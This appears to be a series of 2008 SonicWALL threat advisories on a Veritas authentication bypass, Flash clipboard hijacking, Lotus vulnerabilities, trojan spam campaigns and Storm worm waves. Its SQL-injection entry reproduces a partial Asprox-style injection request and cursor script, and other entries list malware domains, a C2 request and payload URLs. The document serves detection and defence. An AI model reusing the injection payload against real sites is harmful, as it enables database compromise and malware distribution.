Symantec Veritas SFS Auth Bypass (Aug 28, 2008)

The Symantec Veritas Storage Foundation is a storage management suite. The product is composed of several services and agents. One of the services included in this suite is the Scheduler service which listens on TCP port 4888 by default. This is an RPC service with its own built in authentication mechanism.

The authentication mechanism in the Scheduler service utilizes the NT Lan Manager Security Support Provider (NTLM SSP) for security enforcement. The improper utilization of this component allows remote users to establish a NULL session with the service which effectively bypasses the authentication stage of the login procedure. This allows anonymous user logon to the affected service.

Exploitation of this vulnerability may allow anonymous malicious users to add, modify and delete snapshot schedules as well as potentionally run malicious code. SonicWALL has released an IPS signature to detect and block possible attack attempts targeting this vulnerability. The following signature covers this issue:

  • (5204) Symantec Veritas SFW NTLMSSP Authentication Bypass PoC

Flash ads hijack cliboard (Aug 21, 2008)

August 21, 2008

In the Web attacks, which affect Mac, Windows, and Linux users running Firefox, IE, and Safari, bad guys are seizing control of the machine’s clipboard. This is a clever new way to spread malware. If someone replies to an e-mail, they may paste from the clipboard, and get the URL. Likewise with blog posts, social-networking sites, anywhere you paste.

Flash banner ads are using ActionScript code to load (persistently) a malicious URL into a target clipboard. They may be using the Flash command setClipboard. The Flash9b.ocx module is used to parse the file. A number of legitimate sites have been seen to host ads carrying the attack: including Newsweek, Digg, and MSNBC.com.

The URL points to a fake anti-virus program. So-called rogue security programs either make bogus claims that the user’s machine is infected with malware in an attempt to dupe people into buying the software, or in some cases, downloads malware rather than real antivirus software.

The particular variant used in this attack is FakeAlert.TY which we have alerted on July 18, 2008. SonicWALL blocks this attack proactively with GAV: Fakealert.TY (Trojan) signature.

screenshot

We have also released a signature for a variant of the Flash copy-paste exploit – GAV: SWF.CB (Exploit). SonicWALL UTM Research Team is still monitoring for new variants of these attacks and will research them as soon as they appear.

IBM Lotus Product IPS Signatures Summary

IBM Lotus series products were very popular years ago, and they are still some clients’ favorite now. The products include Domino Web Server, Notes, Sametime Server/Client and so on.

Although the products are very useful to most of the clients, there are a lot of vulnerabilities in the products. For example, there was a HTTP Header Accept-Language Buffer Overflow vulnerability in IBM Lotus Domino Server products. Whenever a relatively long string following the Accept-Language header is sent to the server running products with the vulnerabilities, the stack buffer of the program will be overwritten, and the stack return addresses or exception handlers will be modified accordingly. This may allow an attack to inject and execute the malicious code.

SonicWALL UTM Research Team has spent quite long time researching and developing signatures for these vulnerabilities, and we are still doing the research continuously. Now we have 36 signatures related to these vulnerabilities, and they are listed below:

  • 1044 IBM Lotus Sametime Server Multiplexer BO 1
  • 1045 IBM Lotus Sametime Server Multiplexer BO 2
  • 1393 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit
  • 1397 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO PoC
  • 1401 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit
  • 1555 IBM Lotus Notes DOC Attachment Viewer BO PoC
  • 1560 IBM Lotus Notes MIF Attachment Viewer BO Attempt 1
  • 1561 IBM Lotus Notes MIF Attachment Viewer BO Attempt 2
  • 1562 IBM Lotus Notes MIF Attachment Viewer BO Attempt 3
  • 1563 IBM Lotus Notes MIF Attachment Viewer BO Attempt 4
  • 1566 IBM Lotus Notes MIF Attachment Viewer BO Attempt 5
  • 1567 IBM Lotus Notes MIF Attachment Viewer BO Attempt 6
  • 1568 IBM Lotus Notes HTML Message Handling BO PoC 1
  • 1582 IBM Lotus Notes HTML Message Handling BO PoC 2
  • 2015 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 1
  • 2016 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 2
  • 2017 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 3
  • 2026 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 4
  • 3121 Lotus Domino Server 7.0 Denial of Service
  • 4025 IBM Lotus Domino LDAP Server Memory Exception PoC
  • 4026 IBM Lotus Notes HTML Speed Reader Long URL BO Attempt
  • 4327 IBM Lotus Notes UUE File Handling BO PoC
  • 4351 IBM Lotus Domino LDAP Invalid DN BO PoC
  • 4352 IBM Lotus Domino LDAP Invalid DN BO PoC 2
  • 4436 IBM Lotus Domino Web Access Message Handling DoS
  • 4438 IBM Lotus Domino Web Service DoS PoC
  • 4439 IBM Lotus Notes Cross Site Scripting PoC
  • 4463 Lotus Notes URI Handler Argument Injection PoC
  • 4563 IBM Lotus Notes Cross Site Scripting PoC 2
  • 4666 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit 2
  • 4779 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit 2
  • 4940 IBM Lotus Notes Applix Graphics Parsing BO PoC
  • 4984 IBM Lotus Notes WPD Attachment BO PoC
  • 5027 IBM Lotus Domino Web Server HTTP Header BO PoC
  • 5157 IBM Lotus 1-2-3 Work Sheet File Viewer BO PoC
  • 5192 IBM Lotus Domino Accept-Language BO

These signatures have well protected the SonicWALL clients from being attacked, and the following statistics show last 2 months of attack attempts blocked by SonicWALL.

New Contract Downloader Trojan (August 20, 2008)

Starting August 19, 2008, we are seeing a new Downloader-Trojan being spammed on the Internet. It arrives as an e-mail attachment in a zip archive. The e-mails look like following:

Attachment: contract-N3.zip (contains file contract-N3.exe)

Subjects:

  • Your new labour contract
  • Contract of Retirement
  • Contract of settlements
  • Loan Contract
  • Permit for retirement
  • Record in debit of account

Message Body:

——————

Dear Sirs,

We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment.

We are enclosing the file with the prepared contract.

If necessary, we can send it by fax. Looking forward to your decision.

——————

Upon execution, the malware executable creates a directory C:Program FilesMicrosoft Common and drops a copy of itself as wuauclt.exe. It also adds the following registry entry to automaticaly start itself on system reboot:

HKLM…Image File Execution Optionsexplorer.exeDebugger: C:Program FilesMicrosoft Commonwuauclt.exe

The Trojan also tries to connect to aaszxu.ru domain which is hosted in UKRAINE and sends following GET request to it:

GET /load3/ld.php?v=1&rs=615903122&n=1 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: aaszxu.ru

This GET request in return loads following URLs which keeps changing and points to another Trojan [detected as GAV: Wigon.EG (Trojan) by SonicWALL]:

  • hxxp://REMOVEDshclub.ro/img/scan.exe
  • hxxp://REMOVEDmickel.de/cerec/bilder/scan.exe
  • hxxp://REMOVEDnocorp.com/images/scan.exe

SonicWALL detects this new Trojan downloader as GAV: FakeAlert.GP (Trojan).

Remote Desktop Software (Aug 15, 2008)

Remote desktop software is software which allows graphical applications to be run remotely on a server, while being displayed locally. The remote desktop software consists of two separate computer programs, a “host version” that is installed on the computer to be controlled, and a “client version” that is installed on the controlling computer.

Remote desktop software can be divided into two categories. The first group doesn’t have a centralized server — host version software and client version software finds each other directly. Examples of this type of software include Microsoft Remote Desktop Connection and software use the VNC protocol. When host version software and client version software sit in the same network they work pretty well. However, in the scenario client version software and host version software sit in different networks, for example, a home network and a corporate network, setting up the connection could be tricky.

The second group of remote desktop software uses a centralized server to track active peers. When host version software starts, it signs in to the centralized server; the centralized server will assign a temporary ID to the machine. By providing the temporary ID to the centralized server, client version software gets necessary information of the machine it tries to connect. Host version software and client version software then try to connect to each other, either directly or through the centralized server. Examples of this type of software include GoToMyPC and TeamViewer. Typically this type of software provides great functionality to bypass firewalls.

Remote desktop software is made to increase computer users’ productivity. However, misusing the software could bring up security issues. Therefore some companies have policies that disallow the usage of remote desktop software from external networks.

BBC Georgia's President Trojan (Aug 15, 2008)

Aug 15, 2008

Starting August 15, 2008, a new wave of malicious e-mails is being spammed with following subjects:

  • BBC NEWS.
  • Weekly BBC NEWS.
  • Your subscription.

The headlines in the email claim that Georgian president Mikheil Saakashvili is gay. Messages contain a linked image of the President from the BBC website:

Emails include links that are pointing to the following domains:

  • aguadodecea.com
  • elitezeitung.de
  • farmaciacardelus.com
  • freeweb.8k.ro
  • petstogoodhomes.com
  • thecar.fr
  • transporter.tv
  • vishalkullarwar.com
  • www.oris-uk.com
  • xrevolution.de
  • and others

All these locations redirect to a single IP (79.135.167.49).
The name of the malware is “name.avi.exe”.

SonicWALL detects this new wave with following signature:

GAV: FakeAlert.gen (Trojan)

Postcard Storm Wave (Aug 6, 2008)

Aug 6, 2008

A new wave of e-mails was discovered with following subjects:

  • You Have An Ecard
  • A card for you
  • Someone sent you an Ecard.
  • Your Digital Greeting Card is waiting

They are pointing to the following domains:

  • bestlettercard.com
  • supergreetingcard.com
  • freepostcardonline.com
  • worldpostcardart.com
  • superlettercard.com
  • digitalaudiopostcard.com
  • audiopostcardmail.com
  • lettercardadvertising.com
  • yourlettercard.com
  • oldpostcardshop.com

Here are a few examples of such e-mails:

screenshot

The email contains a fake message claiming your neighbor or flatmate has sent you a greeting card along with a link. If the user clicks on the link , it opens up a page and prompts the user to download postcard.exe file which is the new variant of Storm worm.

screenshot

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZN_13 (Worm)

Cisco ActiveX Control Vulnerability (Aug 8, 2008)

A flaw has been discovered in the Cisco Webex Meeting Manager ActiveX control. The flaw creates an exploitable vulnerability that may be leveraged by remote attackers.

The affected ActiveX control exposes one method called NewObject, which takes one single string argument. During the execution of this method, insufficient internal checks are performed on the argument value. The code does not correctly verify and enforce a length limit on the passed string value. The string is simply copied into a fixed size stack buffer regardless of its size. This lack of verification allows a long string to be passed to the affected function thereby overwriting internal memory structures which in turn may allow to divert process flow of the application.

SonicWALL has added a signature 3418 Webex Meeting Manager (atucfobj.dll) ActiveX Control BO Attempt that will detect and prevent generic attack attempts leveraging this vulnerability. Exploits attacking this vulnerability are known to exist.

SQL Injection Attack Wave (Aug 1, 2008)

In the recent few weeks, a lot of SQL Injection attacks appeared on the Internet. These attacks use vulnerable ASP or PHP code to inject malicious SQL into the target database server. Furthermore, some SQL Injection Attack Tools have been developed and released on the Internet. The tools can query the Internet search engine such as Google, to find the ASP/PHP pages as the candidate targets. Then, the malicious SQL codes are injected into the target web pages. The attack may affect the database directly, or even the users who visit the infected pages. Danmec/Asprox SQL Injection Attack Tool is a good example.

The main method of these SQL Injections is to send the following HTTP request to the target:

GET /page.asp?id=xx;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040
00540020007600610072006300680061007200280032003500
350029002C0040004300200076006100720063006800610072
002800320035003500290020004400450043004C0041005200
4500200www.example.com HTTP/1.1

The contents within the CAST function are the hexadecimal value of the SQL sentences, and they may vary. One example of the malicious codes is listed below:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(‘UPDATE [‘+@T+’] SET

In response to these attacks, SonicWALL UTM team has created the following IPS signatures:

  • 1062 DECLARE CURSOR EXEC Attempt (Highly Possible SQL Injection)
  • 1092 CAST EXEC Attempt (Possible SQL Injection)
  • 1445 DECLARE CAST EXEC Attempt (Highly Possible SQL Injection)
  • 1074 DECLARE CAST EXEC Attempt 2 (Highly Possible SQL Injection)
  • 1079 DECLARE CAST EXEC Attempt 3 (Highly Possible SQL Injection)
  • 1080 DECLARE CAST EXEC Attempt 4 (Highly Possible SQL Injection)
  • 1111 DECLARE CAST DECLARE Attempt 1 (Possible SQL Injection)
  • 1112 DECLARE CAST DECLARE Attempt 2 (Possible SQL Injection)
  • 1113 DECLARE CAST DECLARE Attempt 3 (Possible SQL Injection)
  • 1114 DECLARE CAST DECLARE Attempt 4 (Possible SQL Injection)
  • 3336 SQL Inject Attack Attempt

These signatures will detect most of the attack cases described above. The following figure shows us the SQL Injection Attack activities within the last two months.

From the figure we can clearly find that these attacks began at the end of June, and they are still going. The SonicWALL UTM team will continue monitoring the attacks, and release up-to-date information about these SQL Injection Attacks.

New F.B.I. vs Facebook Storm Wave (July 31, 2008)

July 31, 2008

Storm worm authors have changed their spam campaign which now involves fake news story about the FBI and Facebook. Starting July 29, 2008, a new wave of storm e-mails are being spammed with following subjects:

  • F.B.I. can watch our conversation through Facebook
  • FBI agents patrol Facebook
  • FBI may strike Facebook
  • FBI on the Hunt for Facebook users
  • F.B.I. bypasses Facebook to nail you
  • F.B.I. Looks Into Facebook
  • F.B.I. are spying on your Facebook profiles
  • F.B.I. busts alleged Facebook
  • Get Facebooks F.B.I. Files
  • Facebooks F.B.I. ties
  • F.B.I. watching you
  • The FBIs plan to profile Facebook
  • The FBI has a new way of tracking Facebook

In this new wave, they are using IP Addresses or a domain in the URL spammed via e-mail. Here are a few examples of such e-mails:

screenshot

The user will see the following page when he or she clicks on the link in the e-mail:

screenshot

The email contains a fake message related to the FBI and facebook. If the user clicks on the link on the page, it will prompt to download fbi_facebook.exe file which is the new variant of Storm worm.

screenshot

It also drops the following files on the system:

 C:WINDOWSglok+serv.config C:WINDOWSglok+59e6-7783.sys 

It also creates a new service for the glok+59e6-7783.sys and runs it.

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZI (Worm) – Released on July 23, 2008
GAV: Zhelatin.ZM (Worm) – Released on July 29, 2008
GAV: Zhelatin.ZM_2 (Worm) – Released on July 30, 2008

screenshot